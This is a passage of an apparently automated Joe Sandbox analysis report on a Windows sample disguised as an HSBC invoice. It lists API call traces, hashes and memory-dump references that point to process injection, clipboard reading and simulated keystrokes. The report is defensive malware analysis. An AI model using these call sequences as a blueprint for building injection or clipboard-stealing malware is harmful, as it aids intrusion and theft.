                    • CloseHandle.KERNEL32(00000000,?,00EE97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00EE9B62
                    Similarity
                    • API ID: File$CloseCreateHandleTime
                    • String ID:
                    • API String ID: 3397143404-0
                    • Opcode ID: bd0082582c00835aeba93ab7b3a07e56f743035838e0eafe89c3aa081535ba12
                    • Instruction ID: 55721da648dc94914057bd57881d3c5bbac9887ffb820ab861e0f5ad1880a329
                    • Opcode Fuzzy Hash: bd0082582c00835aeba93ab7b3a07e56f743035838e0eafe89c3aa081535ba12
                    • Instruction Fuzzy Hash: 88E0863228031CB7DB311B54EC09FCA7B58BB05B75F104120FB14790E087B12515A798
                    APIs
                    • _free.LIBCMT ref: 00EE8FA5
                      • Part of subcall function 00EA2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA9C64), ref: 00EA2FA9
                      • Part of subcall function 00EA2F95: GetLastError.KERNEL32(00000000,?,00EA9C64), ref: 00EA2FBB
                    • _free.LIBCMT ref: 00EE8FB6
                    • _free.LIBCMT ref: 00EE8FC8
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                    • Instruction ID: 422a3eacb65f05cf68fe530505b87f88df683eafee8f3cac2fe3b403e2d38f5c
                    • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                    • Instruction Fuzzy Hash: D6E012B17097494ECA24A57DAE40A9367EF5F4D354718281DB50DFF142DE24F841C128
                    Similarity
                    • API ID:
                    • String ID: CALL
                    • API String ID: 0-4196123274
                    • Opcode ID: 5089f4e9c622cbb42b1f95864dfba4afd5155344cc7f30d937a18ff8dfabcfb6
                    • Instruction ID: 6db9a655afff1dcecaee8c624ecccbc4b3ea5068d406cfa8f460b6e268907d55
                    • Opcode Fuzzy Hash: 5089f4e9c622cbb42b1f95864dfba4afd5155344cc7f30d937a18ff8dfabcfb6
                    • Instruction Fuzzy Hash: 3E225874508301CFD724EF14C594B6ABBE1BF44304F19996EE89EAB262D731EC81DB82
                    Similarity
                    • API ID: _memmove
                    • String ID: EA06
                    • API String ID: 4104443479-3962188686
                    • Opcode ID: 38d40506675c61ebf7631cd8352999967241deb0e3e5622989f339a693f120ef
                    • Instruction ID: e7f373b03c852e17deecc5d826496d211366cf12eebd1b5319409bcaed0958b6
                    • Opcode Fuzzy Hash: 38d40506675c61ebf7631cd8352999967241deb0e3e5622989f339a693f120ef
                    • Instruction Fuzzy Hash: 5B416BB2A046595BCF21BB6488517FE7FE6EB05304F287065FC8EBF2C2D6219D4087A1
                    APIs
                    • 745CC8D0.UXTHEME ref: 00E84992
                      • Part of subcall function 00EA35AC: __lock.LIBCMT ref: 00EA35B2
                      • Part of subcall function 00EA35AC: RtlDecodePointer.NTDLL(00000001), ref: 00EA35BE
                      • Part of subcall function 00EA35AC: RtlEncodePointer.NTDLL(?), ref: 00EA35C9
                      • Part of subcall function 00E84A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E84A73
                      • Part of subcall function 00E84A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E84A88
                      • Part of subcall function 00E83B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E83B7A
                      • Part of subcall function 00E83B4C: IsDebuggerPresent.KERNEL32 ref: 00E83B8C
                      • Part of subcall function 00E83B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00F462F8,00F462E0,?,?), ref: 00E83BFD
                      • Part of subcall function 00E83B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00E83C81
                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E849D2
                    Similarity
                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$DebuggerDecodeEncodeFullNamePathPresent__lock
                    • String ID:
                    • API String ID: 2688871447-0
                    • Opcode ID: 9f1984879c6e630f3f98d4758ef9918cb65b7d00b56e9c0d1a06a76fcda1f87d
                    • Instruction ID: 0375b3ff5ce099e75f472d740f4d201bae23a6dc204592ecedafa332d6a7f71b
                    • Opcode Fuzzy Hash: 9f1984879c6e630f3f98d4758ef9918cb65b7d00b56e9c0d1a06a76fcda1f87d
                    • Instruction Fuzzy Hash: 2511C0B1904305AFC700EF68DC4591AFBE8EBAA710F00451EF449972B1DBB09648DB92
                    APIs
                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00E85981,?,?,?,?), ref: 00E85E27
                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00E85981,?,?,?,?), ref: 00EBE19C
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    APIs
                    Similarity
                    • API ID: __lock_file_memset
                    • String ID:
                    • API String ID: 26237723-0
                    APIs
                      • Part of subcall function 00EA8D68: __getptd_noexit.LIBCMT ref: 00EA8D68
                    • __lock_file.LIBCMT ref: 00EA561B
                      • Part of subcall function 00EA6E4E: __lock.LIBCMT ref: 00EA6E71
                    • __fclose_nolock.LIBCMT ref: 00EA5626
                    Similarity
                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                    • String ID:
                    • API String ID: 2800547568-0
                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00E21A5B
                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E21AF1
                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E21B13
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272013729.0000000000E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e20000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                    • String ID:
                    • API String ID: 2438371351-0
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    APIs
                    • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00E85CF6
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    APIs
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    APIs
                    Similarity
                    • API ID: _wcscmp
                    • String ID:
                    • API String ID: 856254489-0
                    APIs
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    APIs
                      • Part of subcall function 00E84D13: FreeLibrary.KERNEL32(00000000,?), ref: 00E84D4D
                      • Part of subcall function 00EA548B: __wfsopen.LIBCMT ref: 00EA5496
                    • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00F462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E84F6F
                      • Part of subcall function 00E84CC8: FreeLibrary.KERNEL32(00000000), ref: 00E84D02
                      • Part of subcall function 00E84DD0: _memmove.LIBCMT ref: 00E84E1A
                    Similarity
                    • API ID: Library$Free$Load__wfsopen_memmove
                    • String ID:
                    • API String ID: 1396898556-0
                    APIs
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    APIs
                    • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00E85807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00E85D76
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    APIs
                    Similarity
                    • API ID: _wcscmp
                    • String ID:
                    • API String ID: 856254489-0
                    APIs
                    • __lock_file.LIBCMT ref: 00EA4AD6
                      • Part of subcall function 00EA8D68: __getptd_noexit.LIBCMT ref: 00EA8D68
                    Similarity
                    • API ID: __getptd_noexit__lock_file
                    • String ID:
                    • API String ID: 2597487223-0
                    APIs
                    • FreeLibrary.KERNEL32(?,?,00F462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E84FDE
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    APIs
                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EA09F4
                      • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                    Similarity
                    • API ID: LongNamePath_memmove
                    • String ID:
                    • API String ID: 2514874351-0
                    APIs
                    Similarity
                    • API ID: __fread_nolock
                    • String ID:
                    • API String ID: 2638373210-0
                    • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                    • Instruction ID: 1e6af42643a9e86f3490ec0b5873547e5be0e7cd4390ed27a99972dc4c0aab7d
                    • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                    • Instruction Fuzzy Hash: FBE092B1104B845FD7388A24D8107E373E0BB06319F01081CF29A93342EB6278418759
                    APIs
                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00EBE16B,?,?,00000000), ref: 00E85DBF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: 28bd1f093fb67a02df142781a04db85bdf4ca9156912f0207b1c75bd306d0aec
                    • Instruction ID: b0eadd5450f1e495f4c0b87eaf83abe19a0fcadff1a673b8d4b2590ed27be433
                    • Opcode Fuzzy Hash: 28bd1f093fb67a02df142781a04db85bdf4ca9156912f0207b1c75bd306d0aec
                    • Instruction Fuzzy Hash: 78D0C77464020CBFE710DB80DC46FA9777CE705710F100194FD0456690D6B27D549795
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: __wfsopen
                    • String ID:
                    • API String ID: 197181222-0
                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction ID: ce4d43c0187b3eb251c6ee7cc1ccf72041cb1339467cc9feb3ef39b460eef218
                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction Fuzzy Hash: 71B0927684020C7BDE012E82EC02A593F599B49678F808020FB1C2C162A673A6A09689
                    APIs
                    • GetLastError.KERNEL32(00000002,00000000), ref: 00EED46A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID:
                    • API String ID: 1452528299-0
                    • Opcode ID: 994fb8033c808013d029197cac9cd865752dae5efba0df7e8f9b11c82665fe6d
                    • Instruction ID: 794045f52fe53cc85e6f1a29a0147f9530408e347df1168428a6151a97e5a9fc
                    • Opcode Fuzzy Hash: 994fb8033c808013d029197cac9cd865752dae5efba0df7e8f9b11c82665fe6d
                    • Instruction Fuzzy Hash: 6A7172352083458FC714EF25C8D1A6AB7E0AF98714F14556DF49EAB2A2DB30ED09CB52
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction ID: 2d6677e2d0cd8337bd09546360c4394c5fa96e62b14930fcfc13b390de096c57
                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction Fuzzy Hash: 7131C170A001059FCB18DF58D480969F7A6FF5A304B64EAA5E409EF651D731EDC1DB80
                    APIs
                    • Sleep.KERNELBASE(000001F4), ref: 00E222B1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272013729.0000000000E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e20000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                    • Instruction ID: 407cecd9130654ceb6714f1c12cab1b78aabb2ed06f7fd2bf7e3d2e788b82706
                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                    • Instruction Fuzzy Hash: 61E0BF7594010EEFDB00EFA4D5496DE7BB4EF04311F1005A5FD05E7690DB319E548A62
                    APIs
                    • Sleep.KERNELBASE(000001F4), ref: 00E222B1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272013729.0000000000E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e20000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction ID: 5dca979045576233e8517a2e402af55edc5a88940a427eb1741c5e2b05b8b660
                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction Fuzzy Hash: 60E0E67594010EEFDB00EFB4D54969E7FB4EF04301F100165FD01E2290D6319D508A72
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                    • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 00F0CE50
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F0CE91
                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00F0CED6
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F0CF00
                    • SendMessageW.USER32 ref: 00F0CF29
                    • _wcsncpy.LIBCMT ref: 00F0CFA1
                    • GetKeyState.USER32(00000011), ref: 00F0CFC2
                    • GetKeyState.USER32(00000009), ref: 00F0CFCF
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F0CFE5
                    • GetKeyState.USER32(00000010), ref: 00F0CFEF
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F0D018
                    • SendMessageW.USER32 ref: 00F0D03F
                    • SendMessageW.USER32(?,00001030,?,00F0B602), ref: 00F0D145
                    • SetCapture.USER32(?), ref: 00F0D177
                    • ClientToScreen.USER32(?,?), ref: 00F0D1DC
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F0D203
                    • ReleaseCapture.USER32 ref: 00F0D20E
                    • GetCursorPos.USER32(?), ref: 00F0D248
                    • ScreenToClient.USER32(?,?), ref: 00F0D255
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F0D2B1
                    • SendMessageW.USER32 ref: 00F0D2DF
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F0D31C
                    • SendMessageW.USER32 ref: 00F0D34B
                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F0D36C
                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F0D37B
                    • GetCursorPos.USER32(?), ref: 00F0D39B
                    • ScreenToClient.USER32(?,?), ref: 00F0D3A8
                    • GetParent.USER32(?), ref: 00F0D3C8
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F0D431
                    • SendMessageW.USER32 ref: 00F0D462
                    • ClientToScreen.USER32(?,?), ref: 00F0D4C0
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F0D4F0
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F0D51A
                    • SendMessageW.USER32 ref: 00F0D53D
                    • ClientToScreen.USER32(?,?), ref: 00F0D58F
                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F0D5C3
                      • Part of subcall function 00E825DB: GetWindowLongW.USER32(?,000000EB), ref: 00E825EC
                    • GetWindowLongW.USER32(?,000000F0), ref: 00F0D65F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                    • String ID: @GUI_DRAGID$F
                    • API String ID: 302779176-4164748364
                    • Opcode ID: c820e9024f135bb0570d4a1ad7a5f1e61d0393c2710d95d01b38f32297214cc5
                    • Instruction ID: d0c9f227522888484f0c26746cbfb13e6f8ef33665f793e37113122bb624d6d2
                    • Opcode Fuzzy Hash: c820e9024f135bb0570d4a1ad7a5f1e61d0393c2710d95d01b38f32297214cc5
                    • Instruction Fuzzy Hash: 2742BB34604345AFDB21CF68C844BAABBE5FF49324F14062DFA99972E1C7319845FB92
                    APIs
                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00F0873F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: %d/%02d/%02d
                    • API String ID: 3850602802-328681919
                    • Opcode ID: b10e2d59693e2731eaf051a8666cf8baa605adc3862df093dd74d0edcfcb8969
                    • Instruction ID: c0ddcb42909fd4c2ffecbf32f8550b3db070e286716eab80214823d17f250fdc
                    • Opcode Fuzzy Hash: b10e2d59693e2731eaf051a8666cf8baa605adc3862df093dd74d0edcfcb8969
                    • Instruction Fuzzy Hash: 7412C271900208ABEB258F24CC49FAA7BF4EF497A0F144169F955EB2E1DF709946FB10
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _memmove$_memset
                    • String ID: DEFINE$Oa$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                    • API String ID: 1357608183-2202602582
                    • Opcode ID: bf2f2ed47a1fb01af05ee76deb2fc9c3e1cb5dda1eb798ee98067b5f2fa752e1
                    • Instruction ID: 6e197104b9b3f1f8a6382eee662455844cd49278733b30b8c96cd713b0745e76
                    • Opcode Fuzzy Hash: bf2f2ed47a1fb01af05ee76deb2fc9c3e1cb5dda1eb798ee98067b5f2fa752e1
                    • Instruction Fuzzy Hash: 42938F75A002199BDF24CF68C881BADB7B1FF58314F25916BE955BB390E7709E82CB40
                    APIs
                    • GetForegroundWindow.USER32(00000000,?), ref: 00E84A3D
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EBDA8E
                    • IsIconic.USER32(?), ref: 00EBDA97
                    • ShowWindow.USER32(?,00000009), ref: 00EBDAA4
                    • SetForegroundWindow.USER32(?), ref: 00EBDAAE
                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00EBDAC4
                    • GetCurrentThreadId.KERNEL32 ref: 00EBDACB
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EBDAD7
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00EBDAE8
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00EBDAF0
                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 00EBDAF8
                    • SetForegroundWindow.USER32(?), ref: 00EBDAFB
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EBDB10
                    • keybd_event.USER32(00000012,00000000), ref: 00EBDB1B
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EBDB25
                    • keybd_event.USER32(00000012,00000000), ref: 00EBDB2A
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EBDB33
                    • keybd_event.USER32(00000012,00000000), ref: 00EBDB38
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EBDB42
                    • keybd_event.USER32(00000012,00000000), ref: 00EBDB47
                    • SetForegroundWindow.USER32(?), ref: 00EBDB4A
                    • AttachThreadInput.USER32(?,?,00000000), ref: 00EBDB71
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                    • String ID: Shell_TrayWnd
                    • API String ID: 4125248594-2988720461
                    • Opcode ID: 4a48492040696d2c880dbcd899a75879749ad76e3dc50d3ada39a00b4048c549
                    • Instruction ID: 1888583dde6f162ba72e6313a87d5e1f03a11dfeca6baeb2bc2c3fe967453231
                    • Opcode Fuzzy Hash: 4a48492040696d2c880dbcd899a75879749ad76e3dc50d3ada39a00b4048c549
                    • Instruction Fuzzy Hash: C6316271A4031CBBEB316FA19C89FBF7E6CEB44B50F154025FA04EA1D0D6B15910BBA1
                    APIs
                    • OpenClipboard.USER32(00F0F910), ref: 00EF4284
                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00EF4292
                    • GetClipboardData.USER32(0000000D), ref: 00EF429A
                    • CloseClipboard.USER32 ref: 00EF42A6
                    • GlobalFix.KERNEL32(00000000), ref: 00EF42C2
                    • CloseClipboard.USER32 ref: 00EF42CC
                    • GlobalUnWire.KERNEL32(00000000), ref: 00EF42E1
                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00EF42EE
                    • GetClipboardData.USER32(00000001), ref: 00EF42F6
                    • GlobalFix.KERNEL32(00000000), ref: 00EF4303
                    • GlobalUnWire.KERNEL32(00000000), ref: 00EF4337
                    • CloseClipboard.USER32 ref: 00EF4447
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
